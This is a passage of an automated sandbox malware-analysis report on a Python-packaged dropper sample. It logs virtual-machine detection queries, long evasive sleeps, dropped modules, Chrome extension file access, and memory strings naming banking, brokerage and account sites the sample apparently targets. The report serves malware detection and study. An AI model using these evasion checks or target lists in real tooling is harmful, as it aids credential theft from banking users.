Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 455 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4899 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4440 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 353 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4550
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1301
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3420
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1705
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5989
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1029
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3685
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1727
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2743
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1273
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3192
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 809
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_ssl.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_socket.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_lzma.pyd Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_queue.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_decimal.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\select.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\python311.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_bz2.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_sqlite3.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\unicodedata.pyd Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe API coverage: 1.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996 Thread sleep count: 455 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996 Thread sleep count: 4899 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004 Thread sleep count: 4440 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6784 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004 Thread sleep count: 353 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012 Thread sleep count: 4550 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012 Thread sleep count: 258 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8104 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8268 Thread sleep count: 1301 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8512 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8412 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8836 Thread sleep count: 3420 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8864 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8824 Thread sleep count: 1705 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8852 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3236 Thread sleep count: 5989 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3236 Thread sleep count: 1029 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2984 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2524 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788 Thread sleep count: 3685 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632 Thread sleep count: 1727 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4052 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8432 Thread sleep count: 2743 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8740 Thread sleep count: 1273 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8704 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8728 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032 Thread sleep count: 3192 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9028 Thread sleep count: 809 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9068 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8992 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B110842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 0_2_00007FF7B110842C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B10F8AF0 FindFirstFileExW,FindClose, 0_2_00007FF7B10F8AF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B11124C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00007FF7B11124C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B110842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 0_2_00007FF7B110842C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2D46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 72_2_00007FF71D2D46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D3188E0 FindFirstFileExA, 72_2_00007FF71D3188E0
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2CE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle, 72_2_00007FF71D2CE21C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales Jump to behavior
Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5673000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696497155
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V|
Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5673000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmsrvc
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1457473239.0000016196D0F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1434396229.0000016196D0F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1424053605.0000016196D08000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1764753885.0000016196C5D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWa
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: qemu-ga
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmware
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmusrvc
Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5673000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"m
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696497155f
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696497155s
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareservice
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696497155j
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareuser
Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000003.1439025716.000001ABF5695000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5697000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000003.1438552704.000001ABF568F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696497155o
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwaretray
